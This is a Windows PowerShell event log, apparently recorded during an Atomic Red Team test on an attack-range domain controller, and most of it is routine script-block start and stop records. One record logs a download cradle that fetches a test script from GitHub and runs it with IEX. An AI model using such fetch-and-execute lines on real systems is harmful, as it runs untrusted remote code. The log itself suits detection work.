LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476667
Keywords=None
Message=Started invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476666
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476665
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476664
Keywords=None
Message=Completed invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476663
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476662
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476661
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476660
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476659
Keywords=None
Message=Started invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476658
Keywords=None
Message=Started invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476657
Keywords=None
Message=Completed invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476656
Keywords=None
Message=Started invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476655
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476654
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476653
Keywords=None
Message=Started invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476652
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476651
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476650
Keywords=None
Message=Completed invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476649
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476648
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476647
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476646
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476645
Keywords=None
Message=Started invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476644
Keywords=None
Message=Started invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476643
Keywords=None
Message=Completed invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476642
Keywords=None
Message=Started invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476641
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476640
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476639
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476638
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476637
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476636
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4741ca21-4737-4f39-8be7-d7a1a4b64f0c
Runspace ID: ba4bcc6e-acde-4475-b115-edbd430c9e9a
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476635
Keywords=None
Message=Started invocation of ScriptBlock ID: 4741ca21-4737-4f39-8be7-d7a1a4b64f0c
Runspace ID: ba4bcc6e-acde-4475-b115-edbd430c9e9a
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476634
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: 4741ca21-4737-4f39-8be7-d7a1a4b64f0c
Path:
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476633
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2c72eab5-61ae-4d62-bb59-efa687a43193
Runspace ID: ba4bcc6e-acde-4475-b115-edbd430c9e9a
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476632
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7668fd8d-9188-4c7c-aa61-94a2da626ce6
Runspace ID: ba4bcc6e-acde-4475-b115-edbd430c9e9a
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476631
Keywords=None
Message=Started invocation of ScriptBlock ID: 7668fd8d-9188-4c7c-aa61-94a2da626ce6
Runspace ID: ba4bcc6e-acde-4475-b115-edbd430c9e9a
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476630
Keywords=None
Message=Creating Scriptblock text (1 of 1):
# Test download cradle
write-host -ForegroundColor Cyan "$(Get-Date -Format s) Download Cradle test success!`n"


ScriptBlock ID: 7668fd8d-9188-4c7c-aa61-94a2da626ce6
Path:
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476629
Keywords=None
Message=Completed invocation of ScriptBlock ID: 14c340ff-d2f7-4a91-bd25-b51b3ac7a612
Runspace ID: ba4bcc6e-acde-4475-b115-edbd430c9e9a
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476628
Keywords=None
Message=Started invocation of ScriptBlock ID: 14c340ff-d2f7-4a91-bd25-b51b3ac7a612
Runspace ID: ba4bcc6e-acde-4475-b115-edbd430c9e9a
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476627
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9596821b-59e8-4aa5-ad2c-23320578d1aa
Runspace ID: ba4bcc6e-acde-4475-b115-edbd430c9e9a
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476626
Keywords=None
Message=Started invocation of ScriptBlock ID: 9596821b-59e8-4aa5-ad2c-23320578d1aa
Runspace ID: ba4bcc6e-acde-4475-b115-edbd430c9e9a
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476625
Keywords=None
Message=Started invocation of ScriptBlock ID: 2c72eab5-61ae-4d62-bb59-efa687a43193
Runspace ID: ba4bcc6e-acde-4475-b115-edbd430c9e9a
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476624
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText

ScriptBlock ID: 2c72eab5-61ae-4d62-bb59-efa687a43193
Path:
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1476623
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1476622
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 6836 in AppDomain: DefaultAppDomain.
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1476621
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476620
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476619
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476618
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476617
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476616
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476615
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476614
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476613
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
